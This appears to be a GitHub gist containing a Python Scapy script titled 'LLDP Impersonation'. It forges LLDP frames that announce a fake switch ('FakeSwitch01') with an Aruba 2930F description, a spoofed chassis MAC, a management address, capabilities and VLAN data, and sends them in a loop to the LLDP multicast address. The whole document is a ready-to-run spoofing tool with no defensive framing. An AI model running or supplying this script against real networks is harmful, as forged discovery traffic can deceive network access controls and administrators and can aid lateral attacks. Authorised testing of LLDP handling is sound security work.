Skip to content

Instantly share code, notes, and snippets.

@zemerick1
Created Aug 5, 2021
Embed
What would you like to do?
SCAPY - LLDP Impersonation
#Import Scapy
from scapy.all import *
chassis = bytearray(7)
#chassis[0:3] = (0x02,0x06,0x07)
chassis[0:3] = (0x02,0x07,0x04)
chassis[3:] = (0x94,0xf1,0x28,0x8b,0xaa,0x1f)
#chassis[3:] = str.encode('94:f1:28:8b:aa:1f', 'utf-8')
# Sysname
sysname = bytearray(7)
sysname[0:2] = (0x0a,0x0c)
sysname[2:] = str.encode('FakeSwitch01', 'utf-8')
# Sys Description
sysdesc = bytearray(12)
sysdesc[0:2] = (0x0c,0xa7)
sysdesc[2:] = str.encode('Aruba JL258A 2930F-8G-PoE+-2SFP+ Switch, revision WC.16.10.0015, ROM WC.16.01.0008 (/ws/swbuildm/rel_ajanta_qaoff/code/build/lvm(swbuildm_rel_ajanta_qaoff_rel_ajanta))', 'utf-8')
# Management address
mgmtaddr = bytearray(7)
mgmtaddr[0:2] = (0x10, 0x0c)
mgmtaddr[2:] = (0x05, 0x01, 0x0a, 0x01, 0x01, 0x08, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00)
#portID = bytearray( (0x04,0x07,0x03, 0x00,0x01,0x02,0xff,0xfe,0xfd) ) # fake MAC address
# Port ID
portID = bytearray((0x04, 0x02, 0x07, 0x32))
# Build TTL
TTL = bytearray( (0x06,0x02, 0x00,0x78) )
# Build capabilities
cap = bytearray(7)
cap[0:2] = (0x0e,0x04)
cap[2:] = (0x00, 0x14, 0x00, 0x14)
# Vendor specific attributes
vendor = bytearray(7)
vendor[0:2] = (0xfe, 0x06)
vendor[2:] = (0x00, 0x16, 0xb9, 0x02, 0x00, 0x00)
# Port description
portdescr = bytearray((0x08, 0x01, 0x32))
# LLDP/MED capabilities
med = bytearray(7)
med[0:2] = (0xfe, 0x07)
med[2:] = (0x00, 0x12, 0xbb, 0x01, 0x00, 0x0f, 0x04)
# Local PVID
portvlan = bytearray(7)
portvlan[0:2] = (0xfe, 0x06)
portvlan[2:] = (0x00, 0x80, 0xc2, 0x01, 0x00, 0x01)
# End padding
end = bytearray( (0x00, 0x00) )
# Build payload
payload = bytes( chassis + portID + TTL + sysname + sysdesc + cap + mgmtaddr + vendor + portdescr + med + portvlan + end )
#LLDP multicast address
mac_lldp_multicast = '01:80:c2:00:00:0e'
# Build frame
eth = Ether(src='94:f1:28:8b:aa:1f', dst=mac_lldp_multicast, type=0x88cc)
frame = eth / Raw(load=bytes(payload)) / Padding(b'\x00\x00\x00\x00')
#frame length should be 60, minimum Ethernet frame length
# Output packet to console
frame.show()
# Send packet. To get proper interface run getmac/v on Windows (escape your slashes) OR ip a s eth0 on Linux
sendp(frame, loop=10, count=1, verbose=1, iface="\\Device\\NPF_{63914CF1-16AF-4570-A674-AEB313EBCD3B}")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment